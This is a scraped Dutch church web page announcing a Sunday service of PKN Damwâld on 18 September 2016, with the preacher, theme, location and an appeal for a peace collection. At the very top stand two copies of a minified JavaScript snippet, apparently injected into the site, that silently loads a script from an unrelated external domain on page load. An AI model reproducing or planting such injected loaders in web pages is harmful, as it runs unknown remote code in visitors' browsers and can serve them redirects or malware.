;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 september 2016 9:30 uur - PKN Damwâld
zondag 18 september 2016
09:30 uur
Koffie, thee of fris na de dienst

Kerkdienst zondag 18 september 2016 9:30 uur

Thema: KLAAR VOOR DE START? ... AF!

Zondag 18 september Startzondag

 

vg_-01

 

Informatie

Voorganger:S. Boukes
Thema:KLAAR VOOR DE START? ... AF!
Mededeling:Koffie, thee of fris na de dienst
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Geef voor vrede

18 september: Vredeswerk - Geef voor vrede
Elke dag horen we berichten over oorlog en geweld: in Syrië, Afrika en Afghanistan. Steeds meer beseffen we dat vrede geen vanzelfsprekendheid is. Gelukkig zijn er óók berichten over mensen die zich inzetten voor vrede. Zij geloven dat je vrede kunt leren! De Protestantse Kerk steunt hen van harte via vredesprojecten van Kerk in Actie en PAX. Zoals bijvoorbeeld in Syrië, waar jonge onderwijzers in de steden scholen hebben opgericht waar kinderen van verschillende religies samen les krijgen. Ze hebben lesmateriaal ontwikkeld over vrede en leren een nieuwe generatie om de verbinding te zoeken. In de vluchtelingenkampen steunt Kerk in Actie kerken zoals de Grieks Evangelische kerk in het kamp Idomeni. Duizenden vluchtelingen wachten er wanhopig tot de grenzen open gaan. De kerk helpt hen met voedselpakketten en medische zorg. Soms komen zij gezinnen tegen die uit elkaar gerukt zijn. Kerk in Actie zet zich in om hen weer te herenigen. In Nederland staan gelukkig ook veel mensen klaar om de vluchtelingen welkom te heten. Anderen twijfelen, of voelen zelfs angst voor zoveel vreemdelingen in ons veilige land. Kerk in Actie heeft hier oog voor en wil binnen de kerken het gesprek hierover op gang brengen en kerken helpen bij de opvang van vluchtelingen. Met de opbrengst van deze collecte steunt de Protestantse Kerk deze en andere initiatieven voor vrede van Kerk in Actie en PAX.

Uitganscollecte: Onderhoud gebouwen